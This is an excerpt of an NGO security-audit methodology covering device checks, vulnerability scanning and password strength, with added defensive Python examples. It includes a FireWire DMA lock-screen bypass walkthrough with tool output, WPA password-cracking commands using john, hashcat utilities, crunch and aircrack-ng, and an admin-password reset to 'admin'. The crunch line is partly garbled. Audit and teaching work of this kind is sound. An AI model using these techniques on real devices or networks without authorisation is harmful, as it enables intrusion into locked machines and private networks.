Anti-Virus Updates

Identifying Odd/One-Off Services

Activities

Device and Software Version Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies the software running on computers and its current version. The auditor then checks for known vulnerabilities in any out-of-date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

See the Appendix for a per-OS guide of where to find key data.

Recommendation
Upgrade Operating Systems

Popular operating systems that have reached end of life, such as Windows XP and Windows 7, sadly no longer receive security updates, and machines still running them should be upgraded.

Move to Licensed Operating Systems

While "pirated" operating systems are extremely common (especially Windows) they often leave much to be desired in terms of security. If the OS is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks.

Update Operating Systems

Operating Systems of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

Update Vulnerable Software

Many widely installed software components, such as Java, browsers and office suites, have long histories of vulnerabilities and need to be aggressively updated. Components that are no longer supported at all, such as Adobe Flash, should be removed rather than updated.

Install Anti-Virus
Move to Licensed Anti-Virus
Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless.

Install Anti-Malware scanner
Encrypt Hard Drives
Activate a personal firewall

A Day in the Life

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies the software running on computers and its current version. The auditor then checks for known vulnerabilities in any out-of-date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

As you work with staff members (this pairs well with the device checklist activity), also interview them about the other devices they use, and how they connect to work services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Phone Usage
User Software and Tools
Remote Services
Recommendation

Only use services that encrypt traffic in transit with TLS ("HTTPS"), and turn on the browser's HTTPS-only mode (the HTTPS Everywhere extension that used to provide this has since been retired). This does not itself guarantee protection from all attacks, but it is a good first step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Firewire Access to Encrypted/Locked computers

Summary

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

Any attacker who obtains a running (including sleeping and hibernating!) Windows, Mac, or even Linux laptop with a Firewire port, an ExpressCard expansion slot, or a Thunderbolt port may be able to read, record or modify any sensitive information on the device, even if the screen is “locked” and the information is stored on an encrypted volume or in an encrypted folder. This applies to threats involving loss, theft and confiscation, but also to “checkpoint” scenarios in which the attacker may only have access for a few minutes. Newer operating systems can block DMA from freshly attached devices while the screen is locked (Windows Kernel DMA Protection, for instance), so check whether that protection is present and enabled before reporting a device as vulnerable.

This attack requires physical control of a machine that is not powered off. Full details of the scope of the attack are available at http://www.breaknenter.org/projects/inception/.

Overview
Materials Needed
Considerations
Walkthrough

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

The threat described in this section is more complex than it needs to be. In fact, unencrypted data are vulnerable to any number of simple attacks, the two most straightforward being: 1) rebooting the computer from a USB stick, CD-ROM or DVD containing an alternate operating system, then copying all of the data; or 2) removing the hard drive, inserting it into a different machine, then copying all of the data. These techniques, which work on nearly any computer, even if a strong login password has been set, are effective and widely used, but they require extended physical access to the device. A slightly different attack is described below, one that only requires physical access for a few minutes. It, too, works regardless of login/screen-lock passwords, though only devices with Firewire ports or expansion slots (ExpressCard, CardBus, PCMCIA, etc.) are vulnerable.

The steps required to defend against all of these threats are the same: encrypt your data using a tool like Microsoft’s BitLocker, Apple’s FileVault or the open-source TrueCrypt application. The Firewire attack highlighted here is particularly illustrative, however, because it serves as a reminder that merely setting up an encrypted volume is not enough. In much the same way that a lock does little to protect your home if the door to which it is attached remains open, data encryption is rarely effective while you are logged into your computer. Even if the screen is locked (which would foil the “reboot” and “hard drive removal” attacks described briefly above), an attacker may still find a way to access your sensitive data while the computer is up and running, because the decryption key is present in the computer’s memory. (This is how large-scale encryption actually works. Information remains encrypted at all times on the storage device where it lives, but you are able to access it while you are logged in, or while your encrypted volume is “open,” because your computer decrypts and encrypts it on the fly.)

Walkthrough

Step 1: First, the attacker would connect her computer to the victim’s using a Firewire cable. Either or both machines could be using a true Firewire port or a Firewire expansion card. When a Firewire ExpressCard expansion card is inserted, Windows automatically installs and configures the necessary drivers, even if nobody is logged into the laptop.

Step 2: Once connected, the attacker simply runs the Inception tool, selects the operating system of the target machine and waits a minute or two for the attack to complete (depending on the amount of RAM present):

$ incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.0 (C) Carsten Maartmann-Moe 2012
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...
[*] Searching, 1328 MiB so far
[*] Signature found at 0x8b50c321 (in page # 570636)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In the case of the laptops tested, Inception took approximately two minutes to reach the final, somewhat self-congratulatory line shown above. At that point, we were able to log in using any password. (Entering “asdf” worked just fine, and gave us full access to all data on the computer.) Inception works by temporarily replacing authentication code using the Firewire protocol’s direct memory access (DMA). After a reboot, everything is restored to its original state.

Once again, it is worth noting that successful mitigation of this issue requires a combination of technology (data encryption) and some level of behavior change (shutting down laptops at the end of the day, when traveling and at any time when confiscation, theft, loss or tampering are particularly likely.)
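On Linux laptops, one additional hardening step that auditors commonly recommend alongside the guide's mitigation is to keep the FireWire kernel modules from loading at all, so the controller never initialises. The following Python is an added example for this guide, not SAFETAG tooling; the module names are the standard Linux ones, the sample /proc/modules listing is constructed, and the check does not replace full-disk encryption plus powering off, which is the mitigation that applies to every operating system.

```python
"""Report whether a Linux laptop currently has the FireWire kernel modules
loaded, and emit the modprobe blacklist that keeps them from loading.

Added example, not SAFETAG tooling.  Blacklisting the FireWire modules is a
common extra hardening step on Linux hosts; it does not replace the guide's
mitigation (full-disk encryption plus powering off), which applies to every
operating system.  Module names are the standard Linux ones; SAMPLE_MODULES
is constructed /proc/modules-style output.
"""
from pathlib import Path

# The three modules that make up the Linux FireWire stack (core, OHCI
# controller driver, and the SBP-2 storage protocol the attack leans on).
FIREWIRE_MODULES = ("firewire_core", "firewire_ohci", "firewire_sbp2")

# Constructed sample of /proc/modules on a laptop with a FireWire controller.
SAMPLE_MODULES = """firewire_ohci 40960 0 - Live 0x0000000000000000
firewire_core 65536 1 firewire_ohci, Live 0x0000000000000000
usbhid 53248 0 - Live 0x0000000000000000
"""


def loaded_firewire_modules(proc_modules_text):
    """Names of FireWire modules present in /proc/modules-style text."""
    loaded = []
    for line in proc_modules_text.splitlines():
        if not line.strip():
            continue
        name = line.split(maxsplit=1)[0]   # first column is the module name
        if name in FIREWIRE_MODULES:
            loaded.append(name)
    return loaded


def blacklist_config():
    """Contents for /etc/modprobe.d/blacklist-firewire.conf.

    modprobe treats '-' and '_' in module names interchangeably; the
    hyphenated spelling is the conventional one in modprobe.d files.
    """
    return "".join(f"blacklist {m.replace('_', '-')}\n" for m in FIREWIRE_MODULES)


def check_this_host(path="/proc/modules"):
    """Read the live module list where available; return [] elsewhere."""
    try:
        return loaded_firewire_modules(Path(path).read_text())
    except OSError:
        return []


if __name__ == "__main__":
    print("sample host has loaded:", loaded_firewire_modules(SAMPLE_MODULES))
    print("this host has loaded:", check_this_host())
    print("suggested blacklist:\n" + blacklist_config())
```

Writing the emitted config to /etc/modprobe.d and rebooting prevents the modules from loading; an auditor can also run the script during a device checklist to see which laptops are currently exposed.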

Material that may be Useful:
Recommendation

Password Security Survey

Summary

Weak Passwords

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview
Materials Needed
Considerations
Walkthrough

This exercise supports the auditor in building an effective dictionary that is customized to an organization.

This dictionary can then be used in a variety of ways:

Walkthrough

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Instructions

This component provides resources and recommendations on cracking passwords: the creation of dictionaries, rules to modify those dictionaries, and some basic implementation. This is a dangerous (and in many cases, illegal) skill to use, and should be treated more as a guide to auditors on which password security myths do not hold up against modern password cracking software; use it only with permission and only in very specific situations as a demonstration of the power of even a common laptop against weak passwords.

Primarily for use in the Network Access component, building a password dictionary, understanding the ways to automatically mutate it, and running it against passwords is a useful skill to have, and to use to explain why simple passwords are insecure. This Ars Technica article provides a good insight into the path to tackle iterative password cracking using a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many are possible. If there are tools you are more familiar or comfortable with using, these by no means are required. The only constraints are to be respectful and responsible, as well as keeping focused on the overall goals and not getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. Using a collection of all English words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords in a reasonable timeframe.

An approach which begins with quick, but often fruitful, attacks to more and more complex (and time consuming) attacks is the most rewarding. However, after an hour or two of password hacking, the in-office time on other activities is more valuable, so admit defeat and move on. See the Recommendations section for talking points around the levels of password cracking that exist in the world. You can work on passwords offline/overnight/post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as your main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you already have had to ask for the password to connect to the Internet and update your dictionaries, tools, or so on. Some of these files (especially larger password dictionaries) can be quite large, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity, maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (such as those used by LibreOffice) into useful word lists. It is generally useful to always test with English in addition to the target language.

CloudCracker and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation

In addition, create a customized dictionary with words related to the subject as revealed in the Remote Assessment research: organization name, street address, phone number, email domain, wireless network name, etc. For the organization "ExampleOrg", which has its offices at 123 Central St., Federal District, Countryzstan, which does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
exa
mple
org
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/5/6/7/8, and, based on field experience, four-digit dates back to the year 2001 (plus adding in the founding year of the organization). It's also useful to see what calendar system is in use at your organization's location as some cultures don't use Gregorian years. It's quite amazing how often a recent year will be part of a wifi password -- this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

Optional Further steps

Use CeWL to spider the organization's web properties to generate additional phrases. This list will need review, as some of the generated content is not very useful, but it may be valuable if the site is not in a language the auditor reads fluently.

For passwords other than WPA, specific policies or patterns may help to focus your password dictionary further. PACK (Password Analysis and Cracking Toolkit) "is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of passwords, where it can detect patterns in already-broken passwords to help build new rules. Both password cracking tools listed here are powerful, and have slightly different abilities. The auditor should choose the one they prefer and/or the one which has the features they desire for this job.

Combinator Attack with scripting and Hashcat

One quick way to build a more complex password list is to simply double the list up (a "combinator" attack), so that it includes an entry for each pair of these strings:

You can do a 1-way version of this list simply, such as:

 $ while read -r foo; do while read -r bar; do printf '%s%s\n' "$foo" "$bar"; done < pwdlist.txt; done < pwdlist.txt > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

Hashcat can do this in a live attack under its "combinator" mode, and hashcat-utils (hiding in /usr/share/hashcat-utils/combinator.bin) provides this as a standalone tool. This produces every ordered pair from the two lists, so the output size is the product of the two list sizes (the square, when a list is combined with itself); use it with caution, or use one larger dictionary and one smaller dictionary.

For example, use this combination approach on your custom dictionary (combining it with itself, creating combinations from the above list such as example92, journorights, exampleorgrights):

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is extremely powerful when you have desktop computer systems to use, but has a few wordlist manipulation tools that are useful regardless.

More References: (http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 , http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/ )

Word mutation with John the Ripper (JtR)

JtR is a powerful tool you can use in combination with existing wordlists, and it can also add in common substitutions (people using zero for the letter "o"). JtR can be used to generate a static list of passwords for other programs, or it can be used directly against a password database. JtR is a bit weak at combining words within a wordlist, so you should apply your customizations and any folding before moving on to JtR.

You can add custom "rules" to aid in these substitutions: a base set is included with JtR, but a much more powerful set is added by KoreLogic (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set ("chr file") that takes password frequency data from large collections of real-world passwords to speed up JtR's brute force mode. This PDF presentation has a good walkthrough of how John and Kore's rules work.

Additional guides: http://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux

The bleeding-edge jumbo version combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules provides nice descriptions of what the KoreLogic rules do. In bleeding-jumbo, the "KoreLogicRules" prefix is dropped from the rule names. BackReference provides a great example of rules usage.

Some particularly useful individual rulesets are:

AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation)
AddJustNumbers (adds 1-4 digits to the end of everything)
l33t (leet-speak combinations)

There are some built-in combinations of rulesets; for example, plain --rules runs john's internal collection of default rules, --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

For example:

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP Create a dictionary with just "blah" and run various rules against it to understand how each ruleset or combination works. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces. Running the KoreLogic ruleset combination against a one word dictionary creates a list of 6,327,540 permutations on just that word.
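The keyword generation, combinator and rule steps above can be turned around into a defensive check: does a passphrase the organization proposes fall inside the targeted dictionary an auditor would build from public facts about it? The following Python is an added example for this guide, not SAFETAG tooling and not the real John the Ripper or hashcat rule engines. It uses the guide's fictional ExampleOrg facts as its input, its mutate() function is a small hand-written imitation of AppendYears, AddJustNumbers and l33t, and it also shows the multiplication effect the PROTIP describes: one keyword becomes a few hundred candidates.

```python
"""Check a proposed passphrase against the targeted dictionary an auditor
would build from public facts about the organization.

Added example for this guide, not SAFETAG tooling.  ORG_FACTS is the guide's
fictional ExampleOrg; mutate() is a hand-written imitation of the JtR
AppendYears / AddJustNumbers / l33t rules and of hashcat's combinator mode,
not the real rule engines.
"""
import itertools
import re

# Constructed: the public facts an auditor gathers during Remote Assessment.
ORG_FACTS = {
    "name": "ExampleOrg",
    "address": "123 Central St., Federal District, Countryzstan",
    "topics": ["human rights", "journalism", "journo"],
    "founded": 1992,
}

# A minimal l33t substitution table (the real rulesets try many more).
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def context_keywords(facts):
    """Split every fact into lowercase fragments, as in the guide's list."""
    words = set()
    text = " ".join([facts["name"], facts["address"], *facts["topics"]])
    for token in re.findall(r"[A-Za-z0-9]+", text):
        words.add(token.lower())
        # compound names such as ExampleOrg also contribute their parts
        for part in re.findall(r"[A-Z]?[a-z]+|[0-9]+", token):
            words.add(part.lower())
    founded = str(facts["founded"])
    words.update({founded, founded[-2:]})   # 1992 and 92
    return sorted(words)


def mutate(word, years=range(1990, 2020)):
    """AppendYears- and AddJustNumbers-style suffixes plus a l33t variant.

    Every rule multiplies the list: one base word yields a few hundred
    candidates here, which is the effect the PROTIP above describes.
    """
    bases = {word, word.capitalize(), word.translate(LEET)}
    out = set(bases)
    for base in bases:
        for year in years:
            out.add(f"{base}{year}")             # example1992
            out.add(f"{base}{year % 100:02d}")   # example92
        for n in range(100):
            out.add(f"{base}{n}")                # example7
            out.add(f"{base}{n:02d}")            # example07
    return out


def targeted_dictionary(facts):
    """Keywords, every ordered pair of keywords (combinator), then mutations."""
    keywords = context_keywords(facts)
    bases = set(keywords)
    for a, b in itertools.product(keywords, repeat=2):
        bases.add(a + b)                         # journo + rights -> journorights
    candidates = set()
    for base in bases:
        candidates |= mutate(base)
    return candidates


def is_guessable(passphrase, dictionary):
    """True if the passphrase would fall to the targeted dictionary alone."""
    return passphrase in dictionary


if __name__ == "__main__":
    dictionary = targeted_dictionary(ORG_FACTS)
    print(f"{len(context_keywords(ORG_FACTS))} keywords -> {len(dictionary)} candidates")
    for candidate in ["example92", "journorights", "Countryzstan2014",
                      "correct horse battery staple"]:
        verdict = "REJECT" if is_guessable(candidate, dictionary) else "not in targeted dictionary"
        print(f"{candidate!r}: {verdict}")
```

A passphrase that survives this check is not automatically strong (a real attacker's rules and wordlists are far larger), but one that fails it is certainly weak, which makes the script a useful gate for wifi keys the organization chooses itself.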

Brute force, using John and crunch

JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can try a direct brute force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough approach. Given enough time it will break a password, but it's not particularly fast, even at simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, or so on. WPA passwords are a minimum of 8 characters, a maximum of 16, and some wifi routers will accept punctuation, but in practice these are usually just [email protected]#$. — so:

$ /path/to/crunch 8 16 a[email protected]#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every possible alpha-numeric combination from 8 to 16 characters. This will take a very, very, very long time.
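To put "a very, very, very long time" into numbers, the following Python is an added example for this guide (not SAFETAG tooling) that sums the crunch-style keyspace for each length and converts it into worst-case search time at the guess rates quoted in this section's Resources (2,500/s for a stock laptop, a hundred million/s for a desktop, a billion/s with GPUs). The character sets are assumptions chosen to mirror the guide's "all lower-case" and "all-numeric" reductions.

```python
"""Estimate how long an exhaustive, crunch-style search of a passphrase
keyspace takes at the guess rates this guide quotes.

Added example, not SAFETAG tooling.  The character sets are assumptions
chosen to mirror the guide's "all lower-case" and "all-numeric" reductions;
the guess rates are the guide's own figures for a stock laptop, a desktop
and a GPU-equipped machine.
"""
import string

# Assumed character sets; the guide's own crunch line is the full-alphabet case.
CHARSETS = {
    "lowercase+digits": string.ascii_lowercase + string.digits,   # 36 symbols
    "lowercase": string.ascii_lowercase,                          # 26 symbols
    "digits": string.digits,                                      # 10 symbols
}

# Guesses per second, from the Resources note in this section.
RATES = {
    "laptop": 2_500,
    "desktop": 100_000_000,
    "gpu": 1_000_000_000,
}

UNITS = (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60))


def keyspace(charset_size, min_len, max_len):
    """Number of candidates crunch would emit for lengths min_len..max_len."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_search(charset_size, min_len, max_len, rate):
    """Worst case: every candidate is tried before the right one."""
    return keyspace(charset_size, min_len, max_len) / rate


def human_duration(seconds):
    """Round a duration to the largest sensible unit, e.g. '11.1 hours'."""
    for name, size in UNITS:
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.1f} seconds"


def estimate(charset_name, min_len=8, max_len=16):
    """Worst-case search time for each attacker class, keyed by class name."""
    size = len(CHARSETS[charset_name])
    return {who: human_duration(seconds_to_search(size, min_len, max_len, rate))
            for who, rate in RATES.items()}


if __name__ == "__main__":
    for name in CHARSETS:
        for length in (8, 12, 16):
            print(f"{name:>16}, {length:2d} chars: {estimate(name, length, length)}")
```

Running it shows why the reductions matter: an 8-digit all-numeric key falls to a laptop in about eleven hours, while 8 characters from the 36-symbol set already takes a GPU rig the better part of an hour and every extra character multiplies that by 36.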

Recommendations

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” especially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Material that may be Useful:

Sample Practice

For practice on any of these methods, you can use the wpa-Induction.pcap file from Wireshark.

Resources

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password cracking systems are rated on the number of password guesses they make per second. Stock laptop computers without high-end graphics cards or any other optimizations can guess 2500 passwords/second. More powerful desktop computers can test over a hundred million each second, and with graphics cards (GPUs) that rises to billions of passwords per second. (https://en.wikipedia.org/wiki/Password_cracking).

This website has a good explanation of how increasing the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi, but it uses very out-of-date numbers; consider a basic laptop able to produce "Class E" attacks, and a desktop, "Class F".

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

Recommendation
Materials that may be useful

Password Survey

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

To how many people have you given your current password?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

In which positions in your password are the symbols?

Have you written down your current password?

If you wrote down your current password how is it protected (choose all that apply) ?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

Physical Security Guided Tour

Covered in full in Operational Security Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can be moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Vulnerability Scanning and Analysis

Summary

This component has the auditor discover possible flaws in the organization's devices, services, application designs, and networks by testing and comparing them against a variety of online and offline resources (vulnerability databases, vendor advisories, and auditor investigation) to identify known vulnerabilities. Basic vulnerability analysis should occur alongside the other activities so that evidence can be gathered from the network; deeper research into specific discovered exploits can happen after the on-site audit, to take full advantage of the short time the auditor has on site.

Purpose

It is not uncommon for a cash-strapped human rights NGO to outsource most of its IT infrastructure to a cloud provider, such as Google Apps, or to ad-hoc services (Dropbox, Yahoo! mail, Wordpress, etc.). A better-resourced organization may be more likely to host its critical services at a remote data center, but not have someone designated to update and patch systems as vulnerabilities are released, or to view the services from a security -- as opposed to availability -- standpoint.

The Flow Of Information

Vulnerability Analysis Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Vulnerability Databases

Website Vulnerability Scanning

System Vulnerability Scanning

Activities

Vulnerability Scanning

Summary

While much of SAFETAG focuses on digital security challenges within and around the office, remote attacks on the organization's website, extranets, and unintended information available from "open sources" all pose real threats and deserve significant attention. SAFETAG takes great care to take a very passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns.

This activity uses active research and scanning to detect known vulnerabilities in external and key internal services. Usually penetration tests exploit possible vulnerabilities to confirm their existence.[62] But the use of exploits puts the organization's systems at a level of increased risk[63] that is unacceptable when neither the organization nor the auditor has the time or finances to address the issue. The SAFETAG methodology only uses relatively safe exploitation of vulnerabilities for targeted outcomes. For instance, cracking the wireless access point password allows us to demonstrate the importance of good passwords without singling out any individual's passwords.[64]

Overview
Materials Needed
Considerations
Walkthrough
Setting up OpenVAS in Kali
openvas initial setup
openvas feed update
openvas check setup
openvas stop
openvas start

Visit https://127.0.0.1:9392/ in a web browser and log in.

Using OpenVAS

Once logged in to OpenVAS, the interface is disturbingly simple to use. For most use, using the Wizard to scan the target server works best. Things to verify before doing so:

Once you start a scan, change the display to "auto refresh" to give you more feedback on the scan process. Once the scan is completed, a report can be exported in PDF form.

Common problems

Errors during openvas-start

OpenVAS is a rather ... delicate program. Most often, the openvas-start script will not wait long enough between launching openvassd and openvasmd, causing openvasmd to error out. Re-running openvasmd often works, though an entire stop/start cycle seems to be slightly more reliable. Often, openvasmd will error out, but launch anyway. Checking the web interface at https://127.0.0.1:9392 to make sure that you can log in is the best way to check if it's actually successfully launched.

Lost admin password

From a root command-line, you can reset the web interface's admin password:

openvasmd --create-user=admin
openvasmd --user=admin --new-password=admin

openvasmd will never launch

The below applies to OpenVAS 7.

In many fresh install cases, the openVAS self-signed CA certificate is set to an invalid date, which also causes openvasmd to error out. The check-setup script will recommend rebuilding the database, but the /var/log/openvas/openvasmd.log may have errors discussing certificate errors. If this is the case, try:

rm /var/lib/openvas/CA/*
rm /var/lib/openvas/private/CA/*
openvas-mkcert
openvas-mkcert-client -n -i
openvas-check-setup
openvas-start
openvasmd --rebuild
openvas-stop
openvas-start

Recommendation

The auditor will need to do research and compare against the organization's capacity and risks to give specific recommendations based on the vulnerabilities discovered in the process. Some common recommendations include the following:

Out of Date Content Management System

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but they can also be identified by checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox). See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

Insecure Website Login

HTTPS / SSL – this comes at a cost, both the SSL Certificate and often an upgrade to the hosting plan itself. However, without SSL, every password – including the one used for admin access to the website – goes across the Internet in the clear. This is immediately available to a state-level actor through the ISP, and can also be sniffed if accessed by a staff member on a shared wifi connection (at a coffeeshop or airport), and finally if the attacker has broken in to the office network (see the Local Access section). Enabling SSL (and making it the default for your site) also protects the users of your site.

